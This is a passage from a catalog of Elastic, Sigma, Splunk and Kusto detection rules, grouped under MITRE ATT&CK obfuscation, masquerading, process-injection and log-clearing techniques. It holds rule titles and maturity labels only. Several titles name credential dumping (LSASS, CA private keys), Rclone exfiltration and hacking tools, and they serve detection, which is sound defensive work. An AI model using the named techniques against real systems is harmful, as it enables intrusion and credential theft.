- Elastic Potential PowerShell Obfuscation via Concatenated Dynamic Command Invocation production
- Elastic Potential PowerShell Obfuscation via High Numeric Character Proportion production
- Elastic Potential PowerShell Obfuscation via High Special Character Proportion production
- Elastic Potential PowerShell Obfuscation via Invalid Escape Sequences production
- Elastic Potential PowerShell Obfuscation via Reverse Keywords production
- Elastic Potential PowerShell Obfuscation via Special Character Overuse production
- Elastic Potential PowerShell Obfuscation via String Concatenation production
- Elastic Potential PowerShell Obfuscation via String Reordering production
- Elastic PowerShell Obfuscation via Negative Index String Reversal production
- Sigma Python One-Liners with Base64 Decoding experimental
- Sigma Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Elastic Suspicious Execution with NodeJS production
- Sigma Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix experimental
- Sigma Suspicious Space Characters in RunMRU Registry Path - ClickFix experimental
- Sigma Suspicious Space Characters in TypedPaths Registry Path - FileFix experimental
- Sigma Suspicious Usage of For Loop with Recursive Directory Search in CMD experimental
- Elastic Suspicious Windows Powershell Arguments production
- Splunk Windows Command Obfuscation with Environment Variable Substrings production
- Splunk Windows PowerShell Process Implementing Manual Base64 Decoder production
Obfuscated Files or Information: Fileless Storage T1027.011 3 rules
- Splunk PowerShell WebRequest Using Memory Stream production
- Splunk Windows Njrat Fileless Storage via Registry production
- Splunk Windows Registry Payload Injection production
Obfuscated Files or Information: Encrypted/Encoded File T1027.013 2 rules
- Elastic Deprecated - Encoded Executable Stored in the Registry production
- Splunk Windows Obfuscated Files or Information via RAR SFX production
Obfuscated Files or Information: Compression T1027.015 1 rule
- Elastic File Compressed or Archived into Common Format by Unsigned Process production
Masquerading T1036 202 rules
- Splunk 1 or 2 Character Executable (Windows Event Log)
- Splunk Attacker Tools On Endpoint production
- Kusto Certified Pre-Owned - backup of CA private key - rule 1 available
- Kusto Certified Pre-Owned - backup of CA private key - rule 2 available
- Kusto Certified Pre-Owned - TGTs requested with certificate authentication available
- Sigma CodePage Modification Via MODE.COM test
- Sigma CodePage Modification Via MODE.COM To Russian Language test
- Sigma Computer account renamed without a trailing $ (CVE-2021-42278/42287) experimental
- Elastic Conhost Spawned By Suspicious Parent Process production
- Sigma CreateDump Process Dump test
- Splunk Detect RTLO In File Name production
- Splunk Detect RTLO In Process production
- Splunk DLL Concatenation (PowerShell)
- Splunk DLL Concatenation (Sysmon)
- Splunk DLL Concatenation (Windows Event Log)
- Sigma DumpMinitool Execution test
- Elastic Executable File Creation with Multiple Extensions production
- Splunk Executables Or Script Creation In Suspicious Path production
- Splunk Executables Or Script Creation In Temp Path production
- Elastic Execution from Unusual Directory - Command Line production
- Splunk Execution of File with Multiple Extensions production
- Elastic Execution via Windows Command Debugging Utility production
- Elastic Expired or Revoked Driver Loaded production
- Sigma Exploit for CVE-2015-1641 stable
- Sigma Explorer Process Tree Break test
- Sigma File Download Via Bitsadmin test
- Sigma File Download Via Bitsadmin To A Suspicious Target Folder test
- Elastic File with Right-to-Left Override Character (RTLO) Created/Executed production
- Sigma File With Suspicious Extension Downloaded Via Bitsadmin test
- Sigma Files With System DLL Name In Unsuspected Locations test
- Sigma Files With System Process Name In Unsuspected Locations test
- Sigma Findstr Launching .lnk File test
- Sigma Forfiles.EXE Child Process Masquerading test
- Sigma Greenbug Espionage Group Indicators test
- Sigma HackTool - XORDump Execution test
- Elastic Image Loaded with Invalid Signature production
- Sigma Lazarus System Binary Masquerading test
- Sigma LOL-Binary Copied From System Directory test
- Kusto Masquerading Renamed executables of interest
- Kusto Match Legitimate Name or Location - 2 available
- Elastic Memory Dump File with Unusual Extension production
- Elastic Microsoft Build Engine Using an Alternate Name production
- Sigma MMC Executing Files with Reversed Extensions Using RTLO Abuse experimental
- Splunk Mock System Directory - Windows (Sysmon)
- Splunk Mock System Directory - Windows (Windows Event Log)
- Sigma New or Renamed User Account with '$' Character test
- Sigma New Process Created Via Taskmgr.EXE test
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Splunk Output to File (PowerShell)
- Splunk Output to File (Windows Event Log)
- Sigma Password Protected ZIP File Opened (Suspicious Filenames) test
- Sigma Potential Binary Impersonating Sysinternals Tools test
- Sigma Potential Command Line Path Traversal Evasion Attempt test
- Elastic Potential Credential Access via Renamed COM+ Services DLL production
- Elastic Potential CVE-2025-33053 Exploitation production
- Elastic Potential Data Exfiltration via Rclone production
- Sigma Potential Defense Evasion Via Binary Rename test
- Sigma Potential Defense Evasion Via Rename Of Highly Relevant Binaries test
- Sigma Potential Defense Evasion Via Right-to-Left Override test
- Elastic Potential DLL Side-Loading via Trusted Microsoft Programs production
- Splunk Potential Executable Masquerading as Document - Windows (Sysmon)
- Splunk Potential Executable Masquerading as Document - Windows (Windows Event Log)
- Sigma Potential Fake Instance Of Hxtsr.EXE Executed test
- Sigma Potential File Extension Spoofing Using Right-to-Left Override test
- Sigma Potential Homoglyph Attack Using Lookalike Characters test
- Sigma Potential Homoglyph Attack Using Lookalike Characters in Filename test
- Sigma Potential LSASS Process Dump Via Procdump stable
- Elastic Potential Masquerading as Browser Process production
- Elastic Potential Masquerading as Business App Installer production
- Elastic Potential Masquerading as Communication Apps production
- Elastic Potential Masquerading as System32 Executable production
- Elastic Potential Masquerading as VLC DLL production
- Sigma Potential MsiExec Masquerading test
- Sigma Potential PendingFileRenameOperations Tampering test
- Elastic Potential Privilege Escalation via InstallerFileTakeOver production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Kusto Potential re-named sdelete usage available
- Kusto Potential re-named sdelete usage (ASIM Version)
- Sigma Potential ReflectDebugger Content Execution Via WerFault.EXE test
- Sigma Potential SysInternals ProcDump Evasion test
- Sigma Potential WerFault ReflectDebugger Registry Value Abuse test
- Elastic Potential Windows Error Manager Masquerading production
- Sigma Procdump Execution test
- Sigma Process Execution From A Potentially Suspicious Folder test
- Elastic Process Execution from an Unusual Directory production
- Splunk Process Execution From Suspicious Folder (Sysmon)
- Splunk Process Execution From Suspicious Folder (Windows Event Log)
- Sigma Process Memory Dump Via Comsvcs.DLL test
- Elastic Program Files Directory Masquerading production
- Sigma Ps.exe Renamed SysInternals Tool test
- Sigma PUA - Potential PE Metadata Tamper Using Rcedit test
- Sigma RedSun - Conhost.exe Spawned by TieringEngineService.exe experimental
- Sigma RedSun - TieringEngineService.exe Detected as EICAR Test File experimental
- Sigma RedSun - TieringEngineService.exe Staged in RS-Prefixed Temp Dir experimental
- Sigma Remote Access Tool - Renamed MeshAgent Execution - Windows experimental
- Kusto Rename System Utilities available
- Splunk Rename System Utilities (Windows Event Log)
- Elastic Renamed Automation Script Interpreter production
- Sigma Renamed BrowserCore.EXE Execution test
- Sigma Renamed CreateDump Utility Execution test
- Sigma Renamed Jusched.EXE Execution test
- Sigma Renamed Msdt.EXE Execution test
- Sigma Renamed Office Binary Execution test
- Sigma Renamed Plink Execution test
- Sigma Renamed Powershell Under Powershell Channel test
- Sigma Renamed ProcDump Execution test
- Splunk Renamed Process (Sysmon)
- Sigma Renamed Schtasks Execution experimental
- Elastic Renamed Utility Executed with Short Program Name production
- Sigma Renamed ZOHO Dctask64 Execution test
- Sigma Scheduled Task Creation Masquerading as System Processes experimental
- Sigma Sdiagnhost Calling Suspicious Child Process test
- Sigma SearchIndexer suspicious process activity experimental
- Elastic Signed Proxy Execution via MS Work Folders production
- Sigma Small Sieve Malware File Indicator Creation test
- Elastic Startup Folder Persistence via Unsigned Process production
- Sigma Suspicious Calculator Usage test
- Splunk Suspicious Child Process for lsass.exe (Sysmon)
- Splunk Suspicious Child Process for lsass.exe (Windows Event Log)
- Sigma Suspicious Child Process Of Wermgr.EXE test
- Sigma Suspicious CodePage Switch Via CHCP test
- Elastic Suspicious Communication App Child Process production
- Sigma Suspicious Computer Account Name Change CVE-2021-42287 test
- Sigma Suspicious Copy From or To System Directory test
- Splunk Suspicious Copy on System32 production
- Elastic Suspicious DLL Loaded for Persistence or Privilege Escalation production
- Sigma Suspicious Double Extension Files test
- Sigma Suspicious Download From Direct IP Via Bitsadmin test
- Sigma Suspicious Download From File-Sharing Website Via Bitsadmin test
- Sigma Suspicious DumpMinitool Execution test
- Elastic Suspicious Endpoint Security Parent Process production
- Splunk Suspicious File Created in Public Folder (Sysmon)
- Sigma Suspicious Files in Default GPO Folder test
- Sigma Suspicious LNK Double Extension File Created test
- Elastic Suspicious Microsoft Antimalware Service Execution production
- Elastic Suspicious Microsoft Diagnostics Wizard Execution production
- Splunk Suspicious microsoft workflow compiler rename production
- Splunk Suspicious msbuild path production
- Splunk Suspicious MSBuild Rename production
- Sigma Suspicious MSDT Parent Process test
- Elastic Suspicious Outlook Child Process production
- Sigma Suspicious Parent Double Extension File Execution test
- Splunk Suspicious Parent Process for lsass.exe or services.exe (Sysmon)
- Splunk Suspicious Parent Process for lsass.exe or services.exe (Windows Event Log)
- Splunk Suspicious Parent Process for spoolsv.exe (Sysmon)
- Splunk Suspicious Parent Process for spoolsv.exe (Windows Event Log)
- Splunk Suspicious Process Executed From Container File production
- Elastic Suspicious Process Execution via Renamed PsExec Executable production
- Sigma Suspicious Process Masquerading As SvcHost.EXE test
- Sigma Suspicious Process Parents test
- Sigma Suspicious Process Start Locations test
- Sigma Suspicious Scheduled Task Creation via Masqueraded XML File test
- Sigma Suspicious Start-Process PassThru test
- Elastic Suspicious WerFault Child Process production
- Sigma Suspicious Windows Update Agent Empty Cmdline test
- Splunk Suspicious writes to windows Recycle Bin production
- Elastic Suspicious Zoom Child Process production
- Sigma System File Execution Location Anomaly test
- Splunk System Processes Run From Unexpected Locations production
- Sigma Taskmgr as LOCAL_SYSTEM test
- Elastic UAC Bypass Attempt via Windows Directory Masquerading production
- Sigma Uncommon Svchost Command Line Parameter experimental
- Sigma Uncommon Svchost Parent Process test
- Splunk Unexpected Network Connection from System Process (Sysmon)
- Splunk Unexpected Network Connection from System Process (Windows Event Log)
- Sigma Unsigned .node File Loaded experimental
- Elastic Unsigned DLL Loaded by Svchost production
- Elastic Unsigned DLL Side-Loading from a Suspicious Folder production
- Kusto Unsigned Windows System Binary
- Elastic Untrusted Driver Loaded production
- Elastic Unusual Network Activity from a Windows System Binary production
- Elastic Unusual Parent-Child Relationship production
- Elastic Unusual Process Execution on WBEM Path production
- Elastic Unusual Process Extension production
- Sigma User account created by a computer account experimental
- Sigma Windows Binaries Write Suspicious Extensions test
- Splunk Windows Bluetooth Service Installed From Uncommon Location production
- Splunk Windows Debugger Tool Execution production
- Splunk Windows DotNet Binary in Non Standard Path production
- Splunk Windows Executable Masquerading as Benign File Types production
- Splunk Windows InstallUtil in Non Standard Path production
- Splunk Windows LOLBAS Executed As Renamed File production
- Splunk Windows LOLBAS Executed Outside Expected Path production
- Splunk Windows Masquerading Msdtc Process production
- Splunk Windows MSC EvilTwin Directory Path Manipulation production
- Splunk Windows NetSupport RMM DLL Loaded By Uncommon Process production
- Splunk Windows Process Copied from System Folder (PowerShell)
- Splunk Windows Process Copied from System Folder (Sysmon)
- Splunk Windows Process Copied from System Folder (Windows Event Log)
- Splunk Windows Process Execution From ProgramData production
- Splunk Windows Process Execution in Temp Dir production
- Splunk Windows Process Outside of System Folder (Sysmon)
- Splunk Windows Process Outside of System Folder (Windows Event Log)
- Sigma Windows Processes Suspicious Parent Directory test
- Splunk Windows Renamed Powershell Execution production
- Splunk Windows SoftEther VPN Masquerading as Legitimate Binary production
- Splunk Windows Suspicious Process File Path production
- Splunk Windows Suspicious QEMU Execution production
- Splunk Windows Svchost.exe Parent Process Anomaly production
- Splunk Windows TinyCC Shellcode Execution production
- Splunk Windows Unusual SysWOW64 Process Run System32 Executable production
Masquerading: Invalid Code Signature T1036.001 15 rules
- Elastic Expired or Revoked Driver Loaded production
- Elastic Image Loaded with Invalid Signature production
- Elastic Potential Masquerading as Browser Process production
- Elastic Potential Masquerading as Business App Installer production
- Elastic Potential Masquerading as Communication Apps production
- Elastic Potential Masquerading as System32 Executable production
- Elastic Potential Masquerading as VLC DLL production
- Elastic Startup Folder Persistence via Unsigned Process production
- Elastic Suspicious Communication App Child Process production
- Elastic Suspicious DLL Loaded for Persistence or Privilege Escalation production
- Elastic Suspicious Outlook Child Process production
- Elastic Unsigned DLL Loaded by Svchost production
- Elastic Unsigned DLL Side-Loading from a Suspicious Folder production
- Kusto Unsigned Windows System Binary
- Elastic Untrusted Driver Loaded production
Masquerading: Right-to-Left Override T1036.002 6 rules
- Splunk Detect RTLO In File Name production
- Splunk Detect RTLO In Process production
- Elastic File with Right-to-Left Override Character (RTLO) Created/Executed production
- Sigma MMC Executing Files with Reversed Extensions Using RTLO Abuse experimental
- Sigma Potential Defense Evasion Via Right-to-Left Override test
- Sigma Potential File Extension Spoofing Using Right-to-Left Override test
Masquerading: Rename Legitimate Utilities T1036.003 50 rules
- Splunk Execution of File with Multiple Extensions production
- Sigma File Download Via Bitsadmin test
- Sigma File Download Via Bitsadmin To A Suspicious Target Folder test
- Sigma File With Suspicious Extension Downloaded Via Bitsadmin test
- Sigma LOL-Binary Copied From System Directory test
- Kusto Masquerading Renamed executables of interest
- Elastic Microsoft Build Engine Using an Alternate Name production
- Elastic Potential Credential Access via Renamed COM+ Services DLL production
- Elastic Potential Data Exfiltration via Rclone production
- Sigma Potential Defense Evasion Via Binary Rename test
- Sigma Potential Defense Evasion Via Rename Of Highly Relevant Binaries test
- Sigma Potential Homoglyph Attack Using Lookalike Characters test
- Sigma Potential Homoglyph Attack Using Lookalike Characters in Filename test
- Sigma Potential PendingFileRenameOperations Tampering test
- Sigma Potential WerFault ReflectDebugger Registry Value Abuse test
- Sigma Ps.exe Renamed SysInternals Tool test
- Sigma PUA - Potential PE Metadata Tamper Using Rcedit test
- Sigma Remote Access Tool - Renamed MeshAgent Execution - Windows experimental
- Kusto Rename System Utilities available
- Splunk Rename System Utilities (Windows Event Log)
- Elastic Renamed Automation Script Interpreter production
- Sigma Renamed BrowserCore.EXE Execution test
- Sigma Renamed Jusched.EXE Execution test
- Sigma Renamed Msdt.EXE Execution test
- Sigma Renamed Office Binary Execution test
- Sigma Renamed Powershell Under Powershell Channel test
- Sigma Renamed ProcDump Execution test
- Splunk Renamed Process (Sysmon)
- Sigma Renamed Schtasks Execution experimental
- Elastic Renamed Utility Executed with Short Program Name production
- Sigma Suspicious Copy From or To System Directory test
- Splunk Suspicious Copy on System32 production
- Sigma Suspicious Download From Direct IP Via Bitsadmin test
- Sigma Suspicious Download From File-Sharing Website Via Bitsadmin test
- Elastic Suspicious Microsoft Antimalware Service Execution production
- Elastic Suspicious Microsoft Diagnostics Wizard Execution production
- Splunk Suspicious microsoft workflow compiler rename production
- Splunk Suspicious msbuild path production
- Splunk Suspicious MSBuild Rename production
- Elastic Suspicious Process Execution via Renamed PsExec Executable production
- Sigma Suspicious Start-Process PassThru test
- Splunk System Processes Run From Unexpected Locations production
- Splunk Windows DotNet Binary in Non Standard Path production
- Splunk Windows InstallUtil in Non Standard Path production
- Splunk Windows LOLBAS Executed As Renamed File production
- Splunk Windows Process Copied from System Folder (PowerShell)
- Splunk Windows Process Copied from System Folder (Sysmon)
- Splunk Windows Process Copied from System Folder (Windows Event Log)
- Sigma Windows Processes Suspicious Parent Directory test
- Splunk Windows Renamed Powershell Execution production
Masquerading: Masquerade Task or Service T1036.004 11 rules
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Sigma Scheduled Task Creation Masquerading as System Processes experimental
- Splunk Suspicious Child Process for lsass.exe (Sysmon)
- Splunk Suspicious Child Process for lsass.exe (Windows Event Log)
- Splunk Suspicious Parent Process for lsass.exe or services.exe (Sysmon)
- Splunk Suspicious Parent Process for lsass.exe or services.exe (Windows Event Log)
- Splunk Suspicious Parent Process for spoolsv.exe (Sysmon)
- Splunk Suspicious Parent Process for spoolsv.exe (Windows Event Log)
- Splunk Windows Process Outside of System Folder (Sysmon)
- Splunk Windows Process Outside of System Folder (Windows Event Log)
Masquerading: Match Legitimate Resource Name or Location T1036.005 50 rules
- Splunk Attacker Tools On Endpoint production
- Elastic Execution from Unusual Directory - Command Line production
- Elastic Execution via Windows Command Debugging Utility production
- Sigma Exploit for CVE-2015-1641 stable
- Sigma Files With System DLL Name In Unsuspected Locations test
- Sigma Files With System Process Name In Unsuspected Locations test
- Sigma Greenbug Espionage Group Indicators test
- Sigma Lazarus System Binary Masquerading test
- Kusto Match Legitimate Name or Location - 2 available
- Sigma Potential Binary Impersonating Sysinternals Tools test
- Elastic Potential CVE-2025-33053 Exploitation production
- Elastic Potential Masquerading as Browser Process production
- Elastic Potential Masquerading as Business App Installer production
- Elastic Potential Masquerading as Communication Apps production
- Elastic Potential Masquerading as System32 Executable production
- Elastic Potential Masquerading as VLC DLL production
- Sigma Potential MsiExec Masquerading test
- Elastic Potential Privilege Escalation via InstallerFileTakeOver production
- Elastic Potential Windows Error Manager Masquerading production
- Elastic Process Execution from an Unusual Directory production
- Elastic Program Files Directory Masquerading production
- Sigma RedSun - Conhost.exe Spawned by TieringEngineService.exe experimental
- Sigma RedSun - TieringEngineService.exe Detected as EICAR Test File experimental
- Sigma RedSun - TieringEngineService.exe Staged in RS-Prefixed Temp Dir experimental
- Sigma Scheduled Task Creation Masquerading as System Processes experimental
- Elastic Signed Proxy Execution via MS Work Folders production
- Sigma Small Sieve Malware File Indicator Creation test
- Elastic Suspicious Communication App Child Process production
- Elastic Suspicious Endpoint Security Parent Process production
- Splunk Suspicious File Created in Public Folder (Sysmon)
- Sigma Suspicious Files in Default GPO Folder test
- Elastic Suspicious Microsoft Antimalware Service Execution production
- Elastic Suspicious Outlook Child Process production
- Sigma Suspicious Process Masquerading As SvcHost.EXE test
- Sigma Suspicious Scheduled Task Creation via Masqueraded XML File test
- Elastic UAC Bypass Attempt via Windows Directory Masquerading production
- Sigma Uncommon Svchost Command Line Parameter experimental
- Sigma Uncommon Svchost Parent Process test
- Sigma Unsigned .node File Loaded experimental
- Kusto Unsigned Windows System Binary
- Elastic Unusual Network Activity from a Windows System Binary production
- Elastic Unusual Process Execution on WBEM Path production
- Splunk Windows LOLBAS Executed Outside Expected Path production
- Splunk Windows MSC EvilTwin Directory Path Manipulation production
- Splunk Windows Process Execution From ProgramData production
- Splunk Windows Process Execution in Temp Dir production
- Splunk Windows Process Outside of System Folder (Sysmon)
- Splunk Windows Process Outside of System Folder (Windows Event Log)
- Sigma Windows Processes Suspicious Parent Directory test
- Splunk Windows Suspicious Process File Path production
Masquerading: Double File Extension T1036.007 6 rules
- Elastic Executable File Creation with Multiple Extensions production
- Splunk Potential Executable Masquerading as Document - Windows (Sysmon)
- Splunk Potential Executable Masquerading as Document - Windows (Windows Event Log)
- Sigma Suspicious Double Extension Files test
- Sigma Suspicious LNK Double Extension File Created test
- Sigma Suspicious Parent Double Extension File Execution test
Masquerading: Masquerade File Type T1036.008 4 rules
- Elastic Memory Dump File with Unusual Extension production
- Splunk Suspicious Process Executed From Container File production
- Elastic Unusual Process Extension production
- Splunk Windows Executable Masquerading as Benign File Types production
Masquerading: Break Process Trees T1036.009 3 rules
- Elastic Unusual Parent-Child Relationship production
- Splunk Windows Svchost.exe Parent Process Anomaly production
- Splunk Windows Unusual SysWOW64 Process Run System32 Executable production
Process Injection T1055 125 rules
- Kusto ADWS Connection from Process Injection Target
- Sigma APT PRIVATELOG Image Load Pattern test
- Sigma CobaltStrike Named Pipe test
- Sigma CobaltStrike Named Pipe Pattern Regex test
- Sigma CobaltStrike Named Pipe Patterns test
- Elastic Conhost Spawned By Suspicious Parent Process production
- Splunk Create Remote Thread In Shell Application production
- Sigma Created Files by Microsoft Sync Center test
- Sigma CreateRemoteThread API and LoadLibrary test
- Splunk DLLHost with no Command Line Arguments with Network production
- Sigma Dllhost.EXE Execution Anomaly test
- Sigma DotNet CLR DLL Loaded By Scripting Applications test
- Splunk GPUpdate with no Command Line Arguments with Network production
- Sigma HackTool - CACTUSTORCH Remote Thread Creation test
- Sigma HackTool - CoercedPotato Execution test
- Sigma HackTool - CoercedPotato Named Pipe Creation test
- Sigma HackTool - DInjector PowerShell Cradle Execution test
- Sigma HackTool - EfsPotato Named Pipe Creation test
- Sigma HackTool - HollowReaper Execution experimental
- Sigma HackTool - LittleCorporal Generated Maldoc Injection test
- Sigma HackTool - Potential CobaltStrike Process Injection test
- Sigma Injected Browser Process Spawning Rundll32 - GuLoader Activity test
- Splunk Known Process Injection Commands (PowerShell)
- Splunk Known Process Injection Commands (Sysmon)
- Splunk Known Process Injection Commands (Windows Event Log)
- Splunk Loading Of Dynwrapx Module production
- Sigma Lummac Stealer Activity - Execution Of More.com And Vbc.exe experimental
- Sigma Malicious Named Pipe Created test
- Sigma Malware Shellcode in Verclsid Target Process test
- Sigma ManageEngine Endpoint Central Dctask64.EXE Potential Abuse test
- Splunk Mavinject Execution (EDR)
- Splunk Mavinject Execution (Sysmon)
- Splunk Mavinject Execution (Windows Event Log)
- Sigma Mavinject Inject DLL Into Running Process test
- Sigma Microsoft Sync Center Suspicious Network Connections test
- Splunk Named Pipe Created (Sysmon)
- Sigma Network Connection Initiated Via Notepad.EXE test
- Splunk Notepad with no Command Line Arguments production
- Splunk Potential CVE-2023-23397 (EDR)
- Splunk Potential CVE-2023-23397 (Sysmon)
- Splunk Potential CVE-2023-23397 (Windows Event Log)
- Sigma Potential DLL Injection Or Execution Using Tracker.exe test
- Sigma Potential DLL Sideloading Using Coregen.exe test
- Sigma Potential Dridex Activity stable
- Sigma Potential Executable Run Itself As Sacrificial Process experimental
- Sigma Potential Pikabot Hollowing Activity test
- Sigma Potential Process Hollowing Activity test
- Elastic Potential Process Injection from Malicious Document production
- Sigma Potential Process Injection Via Msra.EXE test
- Sigma Potential Shellcode Injection test
- Splunk Powershell DLL_EXE Injection (PowerShell)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Powershell Fileless Process Injection via GetProcAddress production
- Splunk PowerShell PInvoke Process Injection API Chain production
- Splunk Powershell Remote Thread To Known Windows Process production
- Sigma PowerShell ShellCode test
- Sigma Process Creation Using Sysnative Folder test
- Splunk Process Executed with Null Command Line (Sysmon)
- Splunk Process Executed with Null Command Line (Windows Event Log)
- Elastic Process Injection by the Microsoft Build Engine production
- Kusto Process Injection From Untrusted Process
- Kusto Process Injection Initiated By MMC
- Splunk Rare Remote Thread (Sysmon)
- Sigma Rare Remote Thread Creation By Uncommon Source Image test
- Sigma RedSun - Named Pipe Created experimental
- Sigma RedSun - TieringEngineService.exe Detected as EICAR Test File experimental
- Splunk Remote Thread Created by Uncommon Process (Sysmon)
- Sigma Remote Thread Created In Shell Application test
- Sigma Remote Thread Creation By Uncommon Source Image test
- Sigma Remote Thread Creation In Uncommon Target Image test
- Splunk Remote Thread from Suspicious Folder (Sysmon)
- Sigma Renamed Mavinject.EXE Execution test
- Sigma Renamed ZOHO Dctask64 Execution test
- Splunk Rundll32 Create Remote Thread To A Process production
- Splunk Rundll32 CreateRemoteThread In Browser production
- Splunk SearchProtocolHost with no Command Line with Network production
- Kusto Solorigate Named Pipe
- Sigma Suspect Svchost Activity test
- Splunk Suspicious Child Process for lsass.exe (Sysmon)
- Splunk Suspicious Child Process for lsass.exe (Windows Event Log)
- Sigma Suspicious Child Process Of Wermgr.EXE test
- Elastic Suspicious Communication App Child Process production
- Splunk Suspicious DLLHost no Command Line Arguments production
- Elastic Suspicious Endpoint Security Parent Process production
- Splunk Suspicious GPUpdate no Command Line Arguments production
- Kusto Suspicious named pipes available
- Elastic Suspicious Outlook Child Process production
- Splunk Suspicious Parent Process for lsass.exe or services.exe (Sysmon)
- Splunk Suspicious Parent Process for lsass.exe or services.exe (Windows Event Log)
- Splunk Suspicious Parent Process for spoolsv.exe (Sysmon)
- Splunk Suspicious Parent Process for spoolsv.exe (Windows Event Log)
- Elastic Suspicious Process Access via Direct System Call production
- Elastic Suspicious Process Creation CallTrace production
- Sigma Suspicious Rundll32 Invoking Inline VBScript test
- Splunk Suspicious SearchProtocolHost no Command Line Arguments production
- Sigma Suspicious Userinit Child Process test
- Elastic Suspicious Zoom Child Process production
- Sigma TAIDOOR RAT DLL Load test
- Splunk Trickbot Named Pipe production
- Sigma Uncommon Process Access Rights For Target Image test
- Sigma Uncommon Svchost Command Line Parameter experimental
- Splunk Unexpected Network Connection from System Process (Sysmon)
- Splunk Unexpected Network Connection from System Process (Windows Event Log)
- Elastic Unusual Child Process from a System Virtual Process production
- Elastic Unusual Parent-Child Relationship production
- Elastic Unusual Service Host Child Process - Childless Service production
- Splunk Unusual svchost Child Process (Sysmon)
- Splunk Unusual svchost Child Process (Windows Event Log)
- Splunk Windows List ENV Variables Via SET Command From Uncommon Parent production
- Splunk Windows Process Injection In Non-Service SearchIndexer production
- Splunk Windows Process Injection into Commonly Abused Processes production
- Splunk Windows Process Injection into Notepad production
- Splunk Windows Process Injection Of Wermgr to Known Browser production
- Splunk Windows Process Injection Remote Thread production
- Splunk Windows Process Injection Wermgr Child Process production
- Splunk Windows Process Injection With Public Source Path production
- Splunk Windows Process With NamedPipe CommandLine production
- Splunk Windows PUA Named Pipe production
- Splunk Windows Rasautou DLL Execution production
- Splunk Windows Remote Assistance Spawning Process production
- Splunk Windows RMM Named Pipe production
- Splunk Windows Suspicious C2 Named Pipe production
- Splunk Windows Suspicious Named Pipe production
- Splunk Winhlp32 Spawning a Process production
- Splunk Wscript Or Cscript Suspicious Child Process production
Process Injection: Dynamic-link Library Injection T1055.001 19 rules
- Sigma CreateRemoteThread API and LoadLibrary test
- Sigma HackTool - Potential CobaltStrike Process Injection test
- Splunk Loading Of Dynwrapx Module production
- Sigma ManageEngine Endpoint Central Dctask64.EXE Potential Abuse test
- Splunk Mavinject Execution (EDR)
- Splunk Mavinject Execution (Sysmon)
- Splunk Mavinject Execution (Windows Event Log)
- Sigma Mavinject Inject DLL Into Running Process test
- Splunk Potential CVE-2023-23397 (EDR)
- Splunk Potential CVE-2023-23397 (Sysmon)
- Splunk Potential CVE-2023-23397 (Windows Event Log)
- Sigma Potential DLL Injection Or Execution Using Tracker.exe test
- Splunk Powershell DLL_EXE Injection (PowerShell)
- Splunk PowerShell PInvoke Process Injection API Chain production
- Sigma Renamed Mavinject.EXE Execution test
- Sigma Renamed ZOHO Dctask64 Execution test
- Sigma TAIDOOR RAT DLL Load test
- Splunk Windows Process Injection Of Wermgr to Known Browser production
- Splunk Windows Rasautou DLL Execution production
Process Injection: Portable Executable Injection T1055.002 6 rules
- Kusto ADWS Connection from Process Injection Target
- Kusto Process Injection From Untrusted Process
- Splunk Windows Process Injection into Commonly Abused Processes production
- Splunk Windows Process Injection into Notepad production
- Splunk Windows Process Injection Remote Thread production
- Splunk Windows Process Injection With Public Source Path production
Process Injection: Thread Execution Hijacking T1055.003 3 rules
- Sigma HackTool - LittleCorporal Generated Maldoc Injection test
- Splunk PowerShell PInvoke Process Injection API Chain production
- Sigma Remote Thread Creation In Uncommon Target Image test
Process Injection: Asynchronous Procedure Call T1055.004 1 rule
- Splunk PowerShell PInvoke Process Injection API Chain production
Process Injection: Process Hollowing T1055.012 10 rules
- Sigma HackTool - CACTUSTORCH Remote Thread Creation test
- Sigma HackTool - HollowReaper Execution experimental
- Sigma Potential Pikabot Hollowing Activity test
- Sigma Potential Process Hollowing Activity test
- Splunk PowerShell PInvoke Process Injection API Chain production
- Elastic Suspicious Endpoint Security Parent Process production
- Elastic Suspicious Process Creation CallTrace production
- Sigma Uncommon Svchost Command Line Parameter experimental
- Elastic Unusual Parent-Child Relationship production
- Elastic Unusual Service Host Child Process - Childless Service production
Process Injection: Process Doppelgänging T1055.013 1 rule
- Splunk PowerShell PInvoke Process Injection API Chain production
Indicator Removal T1070 87 rules
- Sigma ADS Zone.Identifier Deleted test
- Sigma ADS Zone.Identifier Deleted By Uncommon Application test
- Sigma Backup Catalog Deleted test
- Sigma Clear PowerShell History - PowerShell test
- Sigma Clear PowerShell History - PowerShell Module test
- Splunk Clear Unallocated Sector Using Cipher App production
- Splunk Clear Windows Event Logs (Windows Event Log)
- Kusto Clearing of forensic evidence from event logs using wevtutil available
- Sigma Clearing Windows Console History test
- Elastic Clearing Windows Console History production
- Elastic Clearing Windows Event Logs production
- Splunk Create or delete windows shares using net exe production
- Elastic Delete Volume USN Journal with Fsutil production
- Sigma Directory Removal Via Rmdir test
- Sigma Disable Administrative Share Creation at Startup test
- Sigma Disable of ETW Trace - Powershell test
- Sigma Disable Powershell Command History test
- Elastic Disable Windows Event and Security Logs Using Built-in Tools production
- Sigma DLL Load By System Process From Suspicious Locations test
- Sigma ETW Trace Evasion Activity test
- Splunk ETW Trace Provider Modified - PowerShell (PowerShell)
- Sigma Event log clear attempt (command) experimental
- Sigma Event log clear attempt (PowerShell) experimental
- Sigma Event log clear attempt (wmi) experimental
- Sigma Event log cleared (native) experimental
- Sigma Event log cleared using Diagnostics (via PowerShell) stable
- Sigma EventLog EVTX File Deleted test
- Sigma Exchange PowerShell Cmdlet History Deleted test
- Sigma File Creation Date Changed to Another Year test
- Sigma File Deleted Via Sysinternals SDelete test
- Sigma File Deletion Via Del test
- Elastic File or Directory Deletion Command production
- Sigma Filter Driver Unloaded Via Fltmc.EXE test
- Sigma Fsutil Suspicious Invocation stable
- Splunk Fsutil Zeroing File production
- Sigma Greedy File Deletion Using Del test
- Sigma IIS WebServer Access Logs Deleted test
- Sigma IIS WebServer Log Deletion via CommandLine Utilities experimental
- Sigma MaxMpxCt Registry Value Changed test
- Splunk Network Share Connection Removal (PowerShell)
- Splunk NirCmd Execution (Sysmon)
- Splunk NirCmd Execution (Windows Event Log)
- Kusto NRT Security Event log cleared available
- Sigma Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE test
- Elastic Potential REMCOS Trojan Execution production
